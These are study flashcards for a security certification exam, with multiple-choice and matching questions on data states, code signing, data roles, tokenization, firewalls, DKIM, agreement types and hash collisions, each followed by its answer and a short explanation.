PM SG 5-6 Flashcards
Data in-transit, data in-use, or data at-rest
1.A point of sale terminal validates a credit card expiration date
2.A cloud app transaction sends data to multiple data centers
3.All backup tapes are stored at a secure facility
4.A database server stores all customer data in a RAID array
5.An email’s digital signature is validated when the message is opened
6.Encrypted data is sent over a VPN between remote sites
1.A point of sale terminal validates a credit card expiration date → Data in-use
2.A cloud app transaction sends data to multiple data centers → Data in-transit
3.All backup tapes are stored at a secure facility → Data at-rest
4.A database server stores all customer data in a RAID array → Data at-rest
5.An email’s digital signature is validated when the message is opened → Data in-use
6.Encrypted data is sent over a VPN between remote sites → Data in-transit
A:
Data in-use: Data actively being processed or manipulated (e.g., a credit card transaction).
Data in-transit: Data moving across a network (e.g., VPN transmission).
Data at-rest: Stored, inactive data (e.g., backups, RAID storage).
A company would like to ensure all new software installations use unmodified code from the developers. Which of the following would provide this functionality?
1.Code signing
2.Input validation
3.Sandboxing
4.Static code analysis
5.Secure cookies
Correct Answer: 1.Code signing
A:
Code signing: Uses digital signatures to verify the integrity and authenticity of software.
Incorrect options:
2.Input validation: Prevents invalid input but doesn’t verify software authenticity.
3.Sandboxing: Isolates programs but doesn’t validate their integrity.
4.Static code analysis: Checks for vulnerabilities, not authenticity.
A company’s IT department uses Google Analytics to produce reports for the CEO on the performance of their in-house web servers. Which of the following would best describe Google Analytics?
1.Data owner
2.Data retention
3.Data plane
4.Data processor
5.Data controller
Correct Answer: 4.Data processor
A:
Data processor: Processes data on behalf of a data controller (e.g., Google Analytics processing website data).
Incorrect options:
2.Data retention: Involves storage policies, not processing.
5.Data controller: Decides how data is processed (e.g., the company, not Google Analytics).
Which of the following technologies is commonly associated with making in-person credit card purchases from a phone or smart watch?
1.Tokenization
2.Key stretching
3.Salted hash
4.Hardware security module
5.Data masking
Correct Answer: 1.Tokenization
A:
Tokenization: Replaces credit card details with a temporary token for security.
Incorrect options:
2.Key stretching & salted hash: Secure passwords but don’t enable payments.
4.HSM: Protects cryptographic keys, not payments.
Which of the following would be considered an loC?
1.Public key received via email
2.Login required an app confirmation
3.Server not responding to pings
4.Passwords stored with a salted hash
5.Laptop restarted after patching
Correct Answer: 3.Server not responding to pings
A:
IoC: Signs of a potential breach, such as network disruptions.
Incorrect options:
2.Login requiring app confirmation: A security measure, not an IoC.
4.Passwords stored with a salted hash: A security best practice.
Match the device to the description:
1) Sensor 2) WAF 3) NGFW 4) Load balancer
A) Backup and manage certificates for all company web servers
B) Use multiple servers to support a single application
C) Forward traffic based on destination IP address
D) Allow or block network traffic based on application name
E) Block application attacks to a web server
F) Access a protected network from an external connection
G) Gather performance metrics from network traffic flows
Match the device to the description:
1.Sensor → G. Gather performance metrics from network traffic flows
2.WAF (Web Application Firewall) → E. Block application attacks to a web server
3.NGFW (Next-Generation Firewall) → D. Allow or block network traffic based on application name
4.Load balancer → B. Use multiple servers to support a single application
A mail server digitally signs all outgoing messages. Which of the following is used to validate these digital signatures?
1.DKIM
2.NAC
3.SMTP
4.RADIUS
5.SPF
Correct Answer: 1.DKIM (DomainKeys Identified Mail)
A:
DKIM: Prevents email spoofing by signing emails.
Incorrect options:
5.SPF: Helps prevent spoofing but doesn’t validate signatures.
3.SMTP: Used for sending emails, not security validation.
A company has begun to work with a local service provider and has created a broad set of goals associated with this relationship.
Which of the following would best describe this document?
1.NDA
2.SoW
3.SLA
4.MSA
5.MOU
Correct Answer: 5.MOU (Memorandum of Understanding)
A:
MOU: A non-binding agreement outlining goals.
Incorrect options:
3.SLA: Defines specific service guarantees.
1.NDA: Covers confidentiality, not service goals.
A company is upgrading their external firewall to a new version. Which security control category would best apply to this firewall?
1.Technical
2.Physical
3.Operational
4.Occupational
5.Managerial
Correct Answer: 1.Technical
A:
Technical controls: Include firewalls, encryption, and authentication systems.
Incorrect options:
5.Managerial: Covers policies, not technology.
2.Physical: Refers to physical security (e.g., locks, cameras).
The hash values from two different inputs are identical. Which of the following would describe this situation?
1.Containerization
2.Spraying
3.Cloning
4.Collision
5.Reflection
Correct Answer: 4.Collision
A:
Collision: Occurs when two different inputs produce the same hash value.
Incorrect options:
3.Cloning: Duplicating data, unrelated to hashing.
2.Spraying: A brute-force attack method.
The Vice President of Sales has asked the IT team to create daily backups of the sales data. The Vice President is an example of a:
1.Data owner
2.Data controller
3.Data steward
4.Data processor
Correct Answer: 1.Data owner
A:
Data owner: Responsible for determining data handling policies.
Incorrect options:
3.Data steward: Manages data but doesn’t set policies.
4.Data processor: Processes data but doesn’t own it.
